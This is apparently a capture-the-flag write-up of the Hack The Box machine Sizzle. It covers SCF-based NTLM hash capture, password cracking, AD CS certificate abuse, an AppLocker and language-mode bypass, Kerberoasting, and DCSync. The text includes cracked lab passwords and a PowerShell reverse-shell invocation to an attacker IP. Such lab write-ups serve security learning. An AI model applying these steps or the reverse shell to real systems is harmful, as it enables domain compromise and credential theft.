$ nmap -p- --min-rate 5000 10.129.73.156
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-26 00:20 EDT
Nmap scan report for 10.129.73.156
Host is up (0.0075s latency).
Not shown: 65507 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
5986/tcp open wsmans
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49668/tcp open unknown
49671/tcp open unknown
49688/tcp open unknown
49689/tcp open unknown
49692/tcp open unknown
49695/tcp open unknown
49700/tcp open unknown
49713/tcp open unknown
Anonymous FTP
This machine allows anonymous FTP access, but there is nothing present on the server:
$ ftp 10.129.73.156
Connected to 10.129.73.156.
220 Microsoft FTP Service
Name (10.129.73.156:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||56291|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
Let's move on for now, we might need this later.
HTTP
This just shows a GIF of bacon sizzling:
Viewing the page source shows the GIF is served from the /images directory, which we cannot list. However, the error page does tell us this is an IIS server:
$ smbmap -u 'guest' -p '' -H 10.129.73.156
[+] IP: 10.129.73.156:445 Name: 10.129.73.156
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll NO ACCESS Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Operations NO ACCESS
SYSVOL NO ACCESS Logon server share
Within the Department Shares, there are loads of directories:
$ smbclient -U 'guest' '//10.129.73.156/Department Shares'
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Jul 3 11:22:32 2018
.. D 0 Tue Jul 3 11:22:32 2018
Accounting D 0 Mon Jul 2 15:21:43 2018
Audit D 0 Mon Jul 2 15:14:28 2018
Banking D 0 Tue Jul 3 11:22:39 2018
CEO_protected D 0 Mon Jul 2 15:15:01 2018
Devops D 0 Mon Jul 2 15:19:33 2018
Finance D 0 Mon Jul 2 15:11:57 2018
HR D 0 Mon Jul 2 15:16:11 2018
Infosec D 0 Mon Jul 2 15:14:24 2018
Infrastructure D 0 Mon Jul 2 15:13:59 2018
IT D 0 Mon Jul 2 15:12:04 2018
Legal D 0 Mon Jul 2 15:12:09 2018
M&A D 0 Mon Jul 2 15:15:25 2018
Marketing D 0 Mon Jul 2 15:14:43 2018
R&D D 0 Mon Jul 2 15:11:47 2018
Sales D 0 Mon Jul 2 15:14:37 2018
Security D 0 Mon Jul 2 15:21:47 2018
Tax D 0 Mon Jul 2 15:16:54 2018
Users D 0 Tue Jul 10 17:39:32 2018
ZZ_ARCHIVE D 0 Mon Jul 2 15:32:58 2018
The Users directory gives me a list of usernames to work with, and perhaps AS-REP roast:
amanda D 0 Mon Jul 2 15:18:43 2018
amanda_adm D 0 Mon Jul 2 15:19:06 2018
bill D 0 Mon Jul 2 15:18:28 2018
bob D 0 Mon Jul 2 15:18:31 2018
chris D 0 Mon Jul 2 15:19:14 2018
henry D 0 Mon Jul 2 15:18:39 2018
joe D 0 Mon Jul 2 15:18:34 2018
jose D 0 Mon Jul 2 15:18:53 2018
lkys37en D 0 Tue Jul 10 17:39:04 2018
morgan D 0 Mon Jul 2 15:18:48 2018
mrb3n D 0 Mon Jul 2 15:19:20 2018
Public D 0 Wed Sep 26 01:45:32 2018
The ZZ_ARCHIVE directory contains a lot of different files, all of which have the same size and modification time but different extensions.
smb: \ZZ_ARCHIVE\> ls
. D 0 Mon Jul 2 15:32:58 2018
.. D 0 Mon Jul 2 15:32:58 2018
AddComplete.pptx A 419430 Mon Jul 2 15:32:58 2018
AddMerge.ram A 419430 Mon Jul 2 15:32:57 2018
ConfirmUnprotect.doc A 419430 Mon Jul 2 15:32:57 2018
ConvertFromInvoke.mov A 419430 Mon Jul 2 15:32:57 2018
ConvertJoin.docx A 419430 Mon Jul 2 15:32:57 2018
CopyPublish.ogg A 419430 Mon Jul 2 15:32:57 2018
<TRUNCATED>
All of these folders were rather useless and contained nothing of interest. I also tried AS-REP roasting the users, to no avail. My thought process was that since we cannot use anything within the share, perhaps we have to put something there.
SCF File -> NTLM Hash
On another HTB machine, Driver, we had to create a .scf file that a user would open, in order to capture NTLM hashes via Responder. I tried the same thing here.
First, I mounted the SMB share.
$ sudo mount -t cifs '//10.129.73.156/Department Shares' ~/htb/sizzle/mnt
[sudo] password for kali:
Password for root@//10.129.73.156/Department Shares:
I started with the most out-of-place location to try the exploit, which was the ZZ_ARCHIVE directory. Then, we can place this file within it:
Nothing came back for this particular directory, and it looked like nothing was happening. So I decided to check exactly which directories I could write to. I used ChatGPT (the best tool ever) to create a quick script to do this:
# ./write.sh
Created file 'test' in directory: /home/kali/htb/sizzle/mnt/Users/Public
Created file 'test' in directory: /home/kali/htb/sizzle/mnt/ZZ_ARCHIVE
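A script along these lines, added here as an example and not the author's write.sh (which the post does not show): it walks the mounted share and reports every directory where a probe file can be created, deleting the probe again so nothing is left behind on the share. It assumes the share is already mounted at the path passed as the first argument, and it copes with directory names containing spaces and '&' (as Department Shares and M&A do).

```sh
#!/bin/sh
# Added example, not the author's write.sh. Walks a mounted share and prints
# every directory in which we can create a file. The probe file is removed
# immediately, so the check leaves no artefacts behind.
# Assumption: the share is already mounted at the path given as $1.

find_writable_dirs() {
    root="$1"
    probe=".write_probe_$$"   # unique name so we never clobber a real file

    # IFS= read -r keeps names with spaces and '&' intact (e.g. "M&A").
    find "$root" -type d 2>/dev/null | while IFS= read -r dir; do
        # Attempt to create a zero-byte file; read-only directories fail quietly.
        if : > "$dir/$probe" 2>/dev/null; then
            rm -f "$dir/$probe"
            printf 'Writable directory: %s\n' "$dir"
        fi
    done
}

if [ "$#" -eq 1 ]; then
    find_writable_dirs "$1"
fi
```

Run it as `./write.sh ~/htb/sizzle/mnt` against the mount point used above; only the directories that accept the probe are printed.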
So I could also write to the Public directory. I copied the test.scf file there and Responder captured a hash!
We can crack this hash easily with john:
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ashare1972 (amanda)
1g 0:00:00:04 DONE (2023-05-26 06:26) 0.2415g/s 2757Kp/s 2757Kc/s 2757KC/s Ashiah08..Ariel!
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
However, this password cannot be used with evil-winrm to log in to the machine.
CertEnroll -> User Shell
With these credentials, we can actually access another share:
$ smbmap -u amanda -p Ashare1972 -H 10.129.73.156
[+] IP: 10.129.73.156:445 Name: 10.129.73.156
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Operations NO ACCESS
SYSVOL READ ONLY Logon server share
Now the CertEnroll share is available. CertEnroll points to Active Directory Certificate Services (AD CS), which provides a web interface for enrolling certificates. This means that /certsrv is probably present on the web server, and visiting it requires credentials:
Using the credentials we have, we can access it:
We can try to request a certificate, and this presents us with 2 options:
Clicking on User Certificate brings us to a page requesting its key strength:
For some reason, I cannot specify the key strength here, so we probably aren't supposed to have this functionality. In this case, we can check the advanced request form:
It appears we have to create a certificate ourselves, then use it to submit a request to be approved. I know that certificates can be used for authentication, and this service is used to sign the certificates to 'make them legit'. As such, we can create a Certificate Signing Request (CSR) via openssl.
Then, we can grab the .csr contents and paste it into the box:
When submitted, we would get the option to download the certificate:
This would download a .cer file to our machine. Using this, we can try to get a shell. Googling online led me to someone's OSCP notes, and it appears it is possible to get a WinRM shell using this certificate with some Ruby code:
Using this, we can get a shell as Amanda:
Privilege Escalation
Bloodhound -> Kerberoastable
Before starting my enumeration on the machine itself, we can use bloodhound-python to scope what we need to do (otherwise we'll be heading in blind).
Then, start neo4j and BloodHound and upload the collected data. I found that the user amanda has no privileges at all. Checking the Kerberoastable accounts, we find that mrlky is a possible target.
Checking the privileges of this user, we can see that they have DCSync privileges over the forest.
So that's the attack path. Normally, I would aim to Kerberoast remotely for both OPSEC reasons and also because impacket is just so easy to use. However, in our initial nmap scan, port 88 is not public facing. This means that we have to Kerberoast on the machine itself using rubeus.exe.
CLM + AppLocker -> CLM Bypass
I tried to download and execute Rubeus, but this is the error I get due to AppLocker:
Other tools like PowerView.ps1 don't work either. The current shell that I have is extremely limited because of Constrained Language Mode (CLM). We can check the Execution Context to confirm this:
There are 2 methods of exploitation here. One is to run a Kerberoast PowerShell script, which would involve bypassing CLM. Fortunately, iRedTeam has a whole article detailing a method that relies on PowerShell versions.
All we need to do is specify that we want to use Powershell Version 2:
Using this method, we can run some scripts. However, it's even better if we can get a CLM-bypassed shell. To do so, we can simply download the Invoke-PowerShellTcp shell to the machine, and then run this command:
Since we have a full shell, we don't actually need Rubeus anymore as there are plenty of Kerberoasting Powershell scripts that (hopefully) don't trigger AppLocker.
However, trying to run this gives me a weird error:
PS C:\Users\amanda\Documents> . .\Invoke-Kerberoast.ps1
PS C:\Users\amanda\Documents> Invoke-Kerberoast
PS C:\Users\amanda\Documents> Invoke-PowerShellTcp : The variable cannot be validated because the value is not a valid value for the SPN variable.
At C:\Users\amanda\Documents\shell.ps1:127 char:21
+ Invoke-PowerShellTcp <<<< -Reverse -IPAddress 10.10.14.9 -Port 4444
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-PowerShellTcp
We can follow the PowerSploit documentation to resolve this.
The above still doesn't work because it complains that the Invoke-UserImpersonation cmdlet is not imported. This means we have to import PowerView.ps1 as well.
After running this, a hash for the user is given to us:
Transfer this to our machine, and we can crack it easily with john:
$ john --wordlist=/usr/share/wordlists/rockyou.txt ticket_hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Football#7 (?)
1g 0:00:00:04 DONE (2023-05-26 09:48) 0.2331g/s 2603Kp/s 2603Kc/s 2603KC/s Forever3!..Flubb3r
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
DCSync
Earlier, we saw that this user had DCSync privileges over the domain, so we can easily use secretsdump.py to dump the administrator hash:
Then, we can use smbexec.py to pass the hash and get an administrator shell.